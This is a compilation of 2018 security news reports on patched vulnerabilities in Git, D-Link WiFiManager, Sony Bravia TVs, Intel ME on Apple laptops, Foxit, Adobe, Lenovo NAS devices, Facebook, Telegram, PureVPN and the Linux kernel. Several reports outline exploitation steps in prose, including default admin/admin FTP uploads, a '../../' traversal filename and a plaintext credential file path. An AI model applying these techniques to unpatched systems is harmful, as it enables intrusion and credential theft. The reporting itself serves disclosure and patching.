“NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.”


The Git Project addresses a critical arbitrary code execution vulnerability in Git
8.10.2018 securityaffairs
Vulnerebility

The Git Project released a new version of the Git client, Github Desktop, or Atom. that addressed a critical remote code execution vulnerability in the Git.
The Git Project addressed a critical remote code execution vulnerability in the Git command line client, Git Desktop, and Atom.

The flaw tracked as CVE-2018-17456 could be exploited by malicious repositories to remotely execute commands on a vulnerable system.

A malicious repository can create a .gitmodules file that contains an URL that starts with a dash.

The usage of a dash when Git clones a repository using the –recurse-submodules argument, will trigger the command to interpret the URL as an option, making possible for an attacker to perform remote code execution on the computer.

“When running “git clone –recurse-submodules”, Git parses the supplied .gitmodules file for a URL field and blindly passes it as an argument to a “git clone” subprocess. If the URL field is set to a string that begins with a dash, this “git clone” subprocess interprets the URL as an option. This can lead to executing an arbitrary script shipped in the superproject as the user who ran “git clone”.”

“In addition to fixing the security issue for the user running “clone”, the 2.17.2, 2.18.1 and 2.19.1 releases have an “fsck” check which can be used to detect such malicious repository content when fetching or accepting a push. See “transfer.fsckObjects” in git-config(1).”

This flaw has been addressed in Git v2.19.1, GitHub Desktop 1.4.2, Github Desktop 1.4.3-beta0, Atom 1.31.2, and Atom 1.32.0-beta3.

Users have to upgrade their installs to the latest version of the Git client, Github Desktop, or Atom.


D-Link fixed several flaws in Central WiFiManager access point management tool
8.10.2018 securityaffairs
Vulnerebility

D-Link addresses several remote code execution and XSS vulnerabilities affecting the Central WiFiManager access point management tool.
D-Link issued security patches to address several remote code execution and cross-site scripting (XSS) vulnerabilities affecting the Central WiFiManager access point management tool.

The vulnerabilities have been reported by researchers at SecureAuth/CoreSecurity

D-Link Central WiFiManager software controller helps network administrators streamline their wireless access point (AP) management workflow. It leverages a centralized server to remotely allow the management and the monitoring of wireless APs on a network.

The software can be deployed both locally and in the cloud.

The researchers discovered four potentially serious flaws in Central WiFiManager for Windows (version 1.03 and others) that can be exploited for arbitrary code execution.

The most severe flaw, tracked as CVE-2018-17440, is related to the presence of default credentials (admin/admin) in the FTP server running on port 9000 of the web app.

An attacker can use it to credentials to connect the server and upload a specially crafted PHP file that once requested will lead to arbitrary code execution.

“The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution.” reads the security advisory.

Central WiFiManager access point management tool

Another flaw discovered by researchers tracked as CVE-2018-17442 is an authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type.

The Central WiFiManager access point management tool allows users to upload RAR archives and an authenticated attacker could exploit this feature by uploading an archive that includes a PHP file whose content will be executed in the context of the web application.

“When the .rar is uploaded is stored in the path ‘\web\captivalportal’ in a folder with a timestamp created by the PHP time() function. In order to know what is the web server’s time we request an information file that contains the time we are looking for. After we have the server’s time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one,” continues the advisory.

The remaining issued include two stored XSS flaws in the “UpdateSite” (CVE-2018-17443) and “addUser” (CVE-2018-17441) functionality, specifically the sitename and usernameparameters, respectively.

The vulnerabilities were reported to D-Link in on June 4, and the company addressed them with the version 1.03R0100-Beta1.


Sony Bravia Smart TVs affected by a critical vulnerability
7.10.2018 securityaffairs
Vulnerebility

Experts at FortiGuard Labs team discovered three vulnerabilities in eight Sony Bravia smart TVs, one of them rated as critical.
Patch management is a crucial aspect for IoT devices, smart objects are surrounding us and represent a privileged target for hackers.

Experts at FortiGuard Labs team discovered three vulnerabilities (a stack buffer overflow, a directory traversal, and a command-injection issue) in eight Sony Bravia smart TVs, one of them rated as critical.

Affected Sony Bravia models include R5C, WD75, WD65, XE70, XF70, WE75, WE6 and WF6.

The most severe vulnerability tracked as CVE-2018-16593 is a command-injection flaw that resides in the Sony application Photo Sharing Plus that allows users to share multimedia content from their mobile devices via Sony Smart TVs.

An attacker needs to share on the same wireless network as the Sony TV in order to trigger the vulnerability.

“This application handles file names incorrectly when the user uploads a media file. An attacker can abuse such filename mishandling to run arbitrary commands on the system, which can result in complete remote code execution with root privilege.” reads the blog post published by Fortinet.
“Fortinet previously released IPS signature Sony.SmartTV.Remote.Code.Execution for this specific vulnerability to proactively protect our customers.”

Sony bravia

Remaining bugs also affect the Sony’s Photo Sharing Plus application running on Sony Bravia. The stack buffer overflow (CVE-2018-16595) is a “memory corruption vulnerability that is tied to the lack of sanitization of user input.

“This is a memory corruption vulnerability that results from insufficient size checking of user input. With a long enough HTTP POST request sent to the corresponding URL, the application will crash.” continues the advisory.
Fortinet previously released IPS signature Sony.SmartTV.Stack.Buffer.Overflow for this specific vulnerability to proactively protect our customers.”

The third flaw directory-traversal vulnerability tracked as CVE-2018-16594 that relates to the way the Photo Sharing Plus app handles file names.

“The application handles file names incorrectly when receiving a user’s input file via uploading a URL. A attacker can upload an arbitrary file with a crafted file name (e.g.: ../../) that can then traverse the whole filesystem.” reads the blog post.
“Fortinet previously released IPS signature Sony.SmartTV.Directory.Traversal for this specific vulnerability to proactively protect our customers.”

Sony has provided over-the-air patch updated to address the flaws, the fixes need to be approved by the user.

“If your television is set to automatically receive updates when connected to the internet, it should have already been updated. This is the default setting for the affected models.” reads the security advisory published by Sony.

“To verify that your television has been updated, please visit the Downloads section of your model’s product page. Click the Firmware update link for details about how to check the software version. If your television has not already been updated, please follow the instructions to download and install the update.”


D-Link Patches Code Execution, XSS Flaws in Management Tool
7.10.2018 securityweek
Vulnerebility

D-Link has released patches for several remote code execution and cross-site scripting (XSS) vulnerabilities found by researchers in the company's Central WiFiManager access point management tool.

Central WiFiManager allows organizations to create and manage multi-site and multi-tenancy wireless networks. The software can be deployed both locally and in the cloud.

Researchers at SecureAuth + CoreSecurity discovered that version 1.03 – and possibly others – of Central WiFiManager for Windows is affected by four potentially serious vulnerabilities that can be exploited for arbitrary code execution.

The most severe of the security holes, CVE-2018-17440, is related to the fact that the web app includes an FTP server running on port 9000 with the default credentials admin/admin. An attacker can use it to establish a connection to the server and upload a specially crafted PHP file. Requesting this file can lead to arbitrary code execution.

Another code execution vulnerability discovered by researchers is CVE-2018-17442, which also involves uploading arbitrary files. The tool allows users to upload RAR archives and experts noticed that they can abuse the functionality to upload archives that include a PHP file whose content will be executed in the context of the web application. However, SecureAuth + CoreSecurity noted in its advisory that authentication is required for exploitation.

"When the .rar is uploaded is stored in the path '\web\captivalportal' in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one," the security firm said in its advisory.

Experts also discovered two stored XSS flaws in the "UpdateSite" (CVE-2018-17443) and "addUser" (CVE-2018-17441) functionality, specifically the sitename and username parameters, respectively.

The vulnerabilities were reported to D-Link in early June and they were patched recently with the release of version 1.03R0100-Beta1.

"This disclosure directly affects the software package and current installations should be update with the new released available to download below. Failure to update may put this software package, the host computer it runs on, and D-Link devices that it manages at risk," D-Link said in its own advisory.


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
5.10.2018 securityweek
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple forgot did not lock it in laptops.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals, it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post that revealed Chipzilla’s ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to access the Intel Manufacturing Mode is using a utility included in Intel ME System Tools software, that anyway isn’t available to the public. The software allows to configure platform settings in one-time programmable memory called Field Programming Fuses (FPF), an operation that is usually made before the shipment, and in ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel maintained access rights for th Intel Management Engine, Gigabit Ethernet, and CPU separate.

In newer systems, the SPI controllers implement the Master Grant feature that could override the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

Experts pointed out that device makers cannot disable the Manufacturing Mode opening the door to cyber attacks by a local attacker.

Ironically one of the major Intel customer, Apple, left Manufacturing Mode enabled, the issue was tracked as CVE-2018-4251.

Apple addressed the problem in June and fixed it with the release of macOS High Sierra 10.13.5 update.

The security experts published a Python code on GitHub to allow Intel to check whether Manufacturing Mode is enabled.

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even “bricking” of hardware.” concludes the experts.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
4.10.2018 securityaffairs
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple forgot did not lock it in laptops.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals, it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post that revealed Chipzilla’s ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to access the Intel Manufacturing Mode is using a utility included in Intel ME System Tools software, that anyway isn’t available to the public. The software allows to configure platform settings in one-time programmable memory called Field Programming Fuses (FPF), an operation that is usually made before the shipment, and in ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel maintained access rights for th Intel Management Engine, Gigabit Ethernet, and CPU separate.

In newer systems, the SPI controllers implement the Master Grant feature that could override the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

Experts pointed out that device makers cannot disable the Manufacturing Mode opening the door to cyber attacks by a local attacker.

Ironically one of the major Intel customer, Apple, left Manufacturing Mode enabled, the issue was tracked as CVE-2018-4251.

Apple addressed the problem in June and fixed it with the release of macOS High Sierra 10.13.5 update.

The security experts published a Python code on GitHub to allow Intel to check whether Manufacturing Mode is enabled.

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even “bricking” of hardware.” concludes the experts.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”


Foxit Reader Update Patches Over 100 Vulnerabilities
4.10.2018 securityweek
Vulnerebility

The newly released Foxit Reader 9.3 brings along patches for over 100 security flaws, including some that could result in remote code execution.

Developed by California-based Foxit Software, the Foxit Reader is a multilingual freemium tool that allows users to create, view, edit, digitally sign, and print Portable Document Format (PDF) files. According to the company, the reader has hundreds of millions of users.

The latest version of the reader, Foxit reveals in an advisory, brings patches for a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs, the most severe of which could result in remote code execution.

The vulnerabilities, Foxit says, could be exploited when parsing strings, when executing certain JavaScript, due to the use of objects which have been deleted or closed, when handling certain properties of annotation objects, or when opening or processing malicious PDF documents.

18 of the vulnerabilities were disclosed by security researchers with Cisco Talos, all of which could be exploited for either remote or arbitrary code execution. The bugs impact the JavaScript engine of the Reader and can be exploited with the help of a specially crafted, malicious PDF either open in the application itself or in a browser, if the browser plugin is enabled.

Most of the remaining security vulnerabilities addressed with this update were discovered by security researchers working with Trend Micro's Zero Day Initiative.

The bugs are said to impact version 9.2.0.9297 and earlier of Foxit Reader and Foxit PhantomPDF and have been addressed with the release of Foxit Reader 9.3 and Foxit PhantomPDF 9.3.

The security updates arrived only days before Adobe released tens of patches for its own PDF tools. On Monday, the company announced the availability of Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456, which address a total of 86 vulnerabilities


Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
3.10.2018 securityaffairs
Vulnerebility

Experts discovered nine vulnerabilities affecting NAS devices that could be exploited by unauthenticated attackers to access protected content.
Nine flaws affecting NAS devices could be exploited by unauthenticated attackers to access protected content.

The vulnerabilities are traked as CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

According to Lenovo, the flaws affect 20 models of network attached storage (NAS) devices sold by the company, including Lenovo-branded NAS devices, LenovoEMC, and Iomega.

The list of vulnerable devices includes eight LenovoEMC NAS (PX) models, nine Iomega StoreCenter (PX and IX) models and the Lenovo branded devices; ix4-300d, ix2 and EZ Media and Backup Center.

The flaws have been discovered as a part of a research project conducted by ISE Labs focused on the security of embedded devices.

Lenovo NAS

Most of the devices audited by the researchers were affected by some sort of OS command injection vulnerability that could be exploited by remote attackers to take over the targeted system via root shell.

Chaining different vulnerabilities it is possible to gain full access to the device, experts noticed for example that the availability of the user’s access token and a session cookie-like identifier ( “__c parameter”) could allow the attackers to reach the goal. A typical attack scenario to gain this information sees attackers to luring an authenticated NAS user by tricking it into visiting a specially crafted malicious website.

“If we want to exploit this OS command injection we are going to need to figure out how these tokens are generated or access to the victim’s iomegaUserCookie (__c) token. Whenever I think about stealing some type of value stored in the user’s browser I think about cross-site scripting (XSS).” states the researchers.

The experts found a cross-site scripting vulnerability that allowed them to access the information, then used stored browser data to execute commands on the vulnerable devices.

Once obtained a target’s NAS access token and “_c parameter” it is possible to target the storage device by knowing its static IP address, a joke for attackers.

Summarizing, chaining command injection vulnerability with privilege escalation issues the attacker could execute commands on the devices on behalf of legitimate users.

The experts reported the vulnerabilities to Lenovo on August 3 and the company issued patches for vulnerable systems on Sept. 20 and publicly disclosed the vulnerabilities on September 30.

The list of CVEs include: CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

Lenovo confirmed that firmware versions 4.1.402.34662 and earlier are vulnerable, users have to download firmware version 4.1.404.34716 (or later).

The company suggests removing any public shares and using the device only on trusted networks in case it is not possible to immediately update the firmware.


Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
3.10.2018 securityaffairs
Vulnerebility

Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, 18 of them rated as critical.
Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, some of them that could be exploited by a remote attacker to execute arbitrary code.

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files, it has hundreds of millions of installations.

Foxit has released Reader 9.3 and Foxit PhantomPDF 9.3 to address security and stability issues.

Foxit Reader 9.3 addressed a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs.

The updates fix a total of 116 vulnerabilities, 18 of them are rated as “critical” and have been discovered by the researchers at Cisco Talos group.

The flaws affect the JavaScript engine of the Foxit Reader, an attacker could exploit the vulnerabilities by creating specially crafted web pages or PDF documents that could trigger these vulnerabilities.

The updates were issued a couple of days before Adobe released security patches for 86 flaws in Mac and Windows version of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.


Adobe Patches 86 Vulnerabilities in Acrobat Products
2.10.2018 securityweek
Vulnerebility

Adobe on Monday released updates for the Windows and macOS versions of its Acrobat products to address tens of vulnerabilities, including critical issues that allow arbitrary code execution.

Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456 patch a total of 86 flaws.

The list includes 22 out-of-bounds write issues, 7 heap overflows, 7 use-after-free bugs, 3 type confusion issues, one double-free bug, 3 buffer errors, and 3 untrusted pointer dereference bugs – all of these are critical and can be exploited for code execution.

One security bypass issue that can lead to privilege escalation has also been classified as “critical.” The remaining flaws are stack overflow, integer overflow, and out-of-bounds read issues that have been described as “important” and which can lead to information disclosure.

Independent researchers and employees of Qihoo 360, Cisco Talos, Beihang University, Palo Alto Networks, Knownsec, Check Point Software Technologies, and Tencent were credited for reporting these vulnerabilities. Many of the security holes were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

However, the researcher credited for the highest number of bugs is Omri Herscovici, vulnerability research team leader at Check Point. He reported 35 of the flaws patched by Adobe on Monday.

While many of the vulnerabilities have been classified as “critical,” Adobe has assigned the security updates a priority rating of “2,” which indicates that there are no known exploits and the company does not believe exploits are imminent.

Last month, Adobe only patched 7 vulnerabilities in its Acrobat products. However, it’s not uncommon for the company to resolve a large number of security weaknesses in these applications – back in July it fixed over 100.

*Updated the number of patched vulnerabilities from 85 to 86 after obtaining clarifications from Adobe


Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
2.10.2018 securityaffairs
Vulnerebility

Adobe has released security updates to fix 86 vulnerabilities in Mac and Windows version of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.
Adobe has released security updates to address 86 vulnerabilities affecting Mac and Windows version of Adobe Acrobat and Adobe Reader. The security updates fix 47 vulnerabilities classified as ‘critical’ and 39 flaws classified as ‘important’.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

46 critical vulnerabilities could be exploited by attackers to execute arbitrary code on the vulnerable systems, the remaining one is a privileges escalation bug. All the 39 flaws classified as ‘important’ are information disclosure.

Users can update their installations manually by choosing Help > Check for Updates, the full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.

Adobe Acrobat and Adobe Reader users should install the latest versions as soon as possible (Acrobat DC and Acrobat Reader DC version 2019.008.20071, Acrobat 2017 and Acrobat Reader DC version 2017.011.30105, Acrobat DC 2015 and Acrobat Reader DC 2015 versions 2015.006.30456).

The security advisory includes the full list of patched vulnerabilities and organizations or experts that reported them.


Several Bugs Exploited in Massive Facebook Hack
1.10.2018 securityaffairs
Social  Vulnerebility

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook Shares More Details About Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code, and use it access the targeted user’s account. An attacker would first have to target one of their friends’ account and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


Telegram CVE-2018-17780 flaw causes the leak of IP addresses when initiating calls
1.10.2018 securityaffairs
Vulnerebility

CVE-2018-17780 – Security researcher Dhiraj Mishra discovered that Telegram default configuration would expose a user’s IP address when making a call.
Strangely tdesktop 1.3.14 and Telegram for windows (3.3.0.0 WP8.1) leaks end-user private and public IP address while making calls.

Dhiraj
@mishradhiraj_
.@telegram unsafe default behavior of P2P leaks IP address, and CVE-2018-17780 is assigned to this.https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html …#infosec #bugbounty

6:45 PM - Sep 29, 2018
53
31 people are talking about this
Twitter Ads info and privacy
Telegram is supposedly a secure messaging application, but it forces clients to only use P2P connection while initiating a call, however this setting can also be changed from “Settings > Privacy and security > Calls > peer-to-peer” to other available options.

The tdesktop and telegram for windows breaks this trust by leaking public/private IP address of end user and there was no such option available yet for setting “P2P > nobody” in tdesktop and telegram for windows.

PS: Even telegram for Android will also leak your IP address if you have not set “Settings > Privacy and security > Calls > peer-to-peer >nobody” (But Peer-to-Peer settings for call option already exists in Telegram for android).

To view this in action in tdesktop:

1. Open tdesktop,
2. Initiate a call to anyone,
3. You will notice the end user IP address is leaking.
cve-2018-17780 telegram

Other scenario:
1. Open tdesktop in Ubuntu and login with user A
2. Open telegram in windows phone login with user B
3. Let user B initiate the call to user A
4. While user A access log will have public/private IP address of user B.

cve-2018-17780 telegram 2

Not only the MTProto Mobile Protocol fails here in covering the IP address, rather such information can also be used for OSINT. This issue was fixed in 1.3.17 beta and v1.4.0 which have an option of setting your “P2P to Nobody/My contacts”, Later CVE-2018-17780 was assign to this vulnerability.

CVE-2018-17780 Telegram

This bug was awarded €2000 by Telegram security team. (Sweeet..)

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj_)
Original post at https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html


Vulnerabilities in PureVPN Client Leak User Credentials
29.9.2018 securityweek
Vulnerebility

The PureVPN client for Windows is impacted by two vulnerabilities that result in user credential leak, a Trustwave security researcher has discovered.

The bugs, Trustwave’s Manuel Nader says, may allow a local attacker to retrieve the stored password of the last user who successfully logged in to the PureVPN service. The attack is performed directly through the GUI (Graphical User Interface), without the need of another tool.

For the attack to work, the PureVPN client should have a default installation, the attacker should have access to any local user account, and a user should have successfully logged in to the PureVPN using the client on a Windows machine.

When disclosing another user’s credentials in a multiuser environment, the Windows machine should have more than one user.

The security researcher discovered that, in version 5.18.2.0 of the PureVPN Windows client, the user password is revealed in the application’s configuration window.

To retrieve the password, the attacker simply needs to open the PureVPN client, access the configuration window, open the "User Profile" tab, and click on "Show Password."

The researcher also discovered that the PureVPN client for Windows stores the login credentials (username and password) in plaintext in a login.conf file located at 'C:\ProgramData\purevpn\config\. What’s more, all local users have permissions to read this file, the researcher discovered.

The issues were disclosed to the vendor in mid-August 2017. A patch was released in June 2018. PureVPN users on Windows are advised to update to version 6.1.0 or later, as this iteration removes the plaintext password vulnerability.

“The vendor has accepted the risks of the password being revealed in the client's configuration window,” Nader says.


Trustwave expert found 2 credential leak issues in Windows PureVPN Client
29.9.2018 securityaffairs
Vulnerebility

Trustwave expert discovered that the PureVPN client for Windows is affected by two vulnerabilities that could result in the credential leak.
Manuel Nader, an expert from Trustwave, discovered two vulnerabilities in the PureVPN client for Windows that could be exploited by a local attacker to access the stored password of the last user who successfully logged in to the PureVPN service.

The attack works against users using PureVPN client with a default installation, it is launched directly through the Graphical User Interface.

The experts tested for these flaw under the following assumptions and conditions:

The PureVPN client has a default installation.
The attacker has access to any local user account.
Someone has successfully logged in to the PureVPN using the client on a Windows machine at any point in time.
The Windows machine has more than one user in the case of disclosing another users credentials in a multiuser environment.
Nader discovered that user password is visible in the configuration window of the PureVPN Windows client, the issue affects the version 5.18.2.0.

To access the password, the attacker just needs to open the configuration window, open the “User Profile” tab, and click on “Show Password.”

“The PureVPN Windows Client provided by PureVPN may allow a local attacker to retrieve the stored password of the last user who successfully logged in to the PureVPN service. Because of this, a local attacker may obtain another user’s PureVPN credentials when a Windows machine has multiple users if they have successfully logged in.” states the advisory published by Trustwave.

“The attack is done exclusively through the GUI (Graphical User Interface), there’s no need to use an external tool.”

PureVPN Client

Nader also discovered that the PureVPN client for Windows stores the login credentials in plain text in a login.conf file at the path “‘C:\ProgramData\purevpn\config\.”

The researcher discovered that any local users have permissions to read this file.

“The PureVPN Windows Client stores the Login Credentials (username and password) in plaintext. The location of such files is: ‘C:\ProgramData\purevpn\config\login.conf'” continues the advisory.

“Additionally, all local users can read this file.”

The expert notified the issues to the vendor in mid-August 2017 and a security patch addressing them was released in June 2018.

PureVPN users urge to update to version 6.1.0 or later.

“Finally, some recommendations are:

In case you use the PureVPN for Windows, verify you are running the latest version, if not update.
Never reuse password between services.
Whenever possible, enable two-factor authentication.” recommends Trustwave.


Google Project Zero Discloses New Linux Kernel Flaw
28.9.2018 securityweek
Vulnerebility

Google Project Zero this week disclosed the details and released a proof-of-concept (PoC) exploit for a potentially serious Linux kernel vulnerability.

The flaw, tracked as CVE-2018-17182 and assigned a severity rating of “high,” was discovered by Google Project Zero’s Jann Horn. The security hole is a use-after-free introduced in August 2014 with the release of version 3.16 of the Linux kernel.

Use-after-free vulnerabilities can typically be exploited to corrupt data in memory, cause a process to crash (i.e. DoS attack), and execute arbitrary code or commands.

In the case of CVE-2018-17182, Horn says an attacker could run an arbitrary binary with root privileges. The PoC exploit made available by the researcher can help an attacker gain a root shell, but it takes roughly an hour to execute.

He explained in a blog post that exploitation takes some time because the process triggering the vulnerability needs to run for long enough to overflow a reference counter.

